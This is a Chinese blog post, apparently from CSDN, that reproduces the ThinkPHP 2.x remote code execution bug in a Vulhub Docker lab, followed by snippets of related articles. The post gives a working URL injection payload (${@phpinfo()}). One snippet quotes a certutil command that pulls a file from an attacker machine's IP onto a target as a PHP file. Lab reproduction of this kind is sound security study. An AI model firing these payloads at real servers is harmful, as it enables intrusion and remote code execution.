Thinkphp 2-rce 漏洞复现(vulhub)

最新推荐文章于 2024-12-03 13:03:22 发布
原创 最新推荐文章于 2024-12-03 13:03:22 发布 · 433 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

  1. 首先,你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具,然后克隆对应的ThinkPHP 2漏洞利用环境。

  2. 进入ThinkPHP 2漏洞利用环境所在的目录,打开docker-compose.yml文件,找到相关的端口映射配置信息。

  3. 运行命令docker-compose up -d启动漏洞环境。

  4. 使用浏览器访问http://localhost:port,其中port为你在docker-compose.yml文件中配置的端口号。

  5. 在浏览器中,你将看到一个简单的ThinkPHP应用程序。根据漏洞描述,你需要在URL中添加参数来触发漏洞。

  6. 将上述URL参数添加到应用程序的URL后面,然后按回车键执行请求。

  7. 如果成功利用漏洞,你将在浏览器中看到返回的结果,例如当前用户的信息。

复现过程

然后访问

 在请求url中加入

?s=/index/index/name/$%7B@phpinfo()%7D

 

 这样就复现成功了

微信公众号:猫蛋儿安全

最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2933
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
复现Thinkphp 2.x 任意代码执行漏洞
记录并分享学习安全的知识点..
07-03 568
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架,这个框架曾经爆出各种RCE和SQL注入漏洞。由于 ThinkPHP 中没有对控制器进行检测,导致在没有开启强制路由的情况下攻击者可以通过此漏洞进行远程命令执行。 ......
thinkphp2rce漏洞复现
mlws1900的博客
07-07 1188
0x01 漏洞描述 描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞0x02 影响版本 影响Thinkphp 2.x的版本0x03 漏洞利用root权限启动docker(我用kali不给root没法搭建环境) 查看docker进
Thinkphp 2-rce漏洞复现(全过程)
最新发布
2401_87057954的博客
12-03 871
php漏洞复现
thinkphp漏洞复现
YouthBelief的博客
10-25 4039
thinkphp漏洞前言一、thinkphp-2x-rce 代码执行0x01 漏洞描述0x02 影响版本0x03 漏洞利用0x04 漏洞修复二、thinkphp 代码执行 (CNVD-2018-24942)0x01 漏洞描述0x02 影响范围0x03 漏洞利用这就完成了,这边我们引用下大佬的poc0x04 漏洞修复三、 thinkphp3.2.x 代码执行0x01漏洞描述0x02影响范围0x03漏洞利用payload0x04漏洞修复四、thinkphp 命令执行 (CVE-2018-1002015)0x01
thinkphp 2-rce
weixin_51692662的博客
11-01 618
thinkphp 2-rce
thinkphp2-rce远程代码执行漏洞
weixin_45653478的博客
04-27 661
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
vulhubthinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
m0_75036923的博客
09-07 1020
【代码】【vulhubthinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1381
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)
thinkphp 2 - rce漏洞复现
Tender*的博客
08-06 627
thinkphp 2 - rce漏洞复现
ThinkPHP2--RCE漏洞复现
m0_74402888的博客
05-03 1373
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
thinkphp2.xRCE漏洞复现
kjssy的博客
08-19 262
启动环境之后访问ip:8080。
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1887
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 454
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
RCE命令注入
m0_75178803的博客
06-18 720
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。
vulhubthinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 885
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
thinkphp漏洞复现2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1878
参考文章:https://blog.youkuaiyun.com/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最新版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.youkuaiyun.com/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.youkuaiyun.com/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值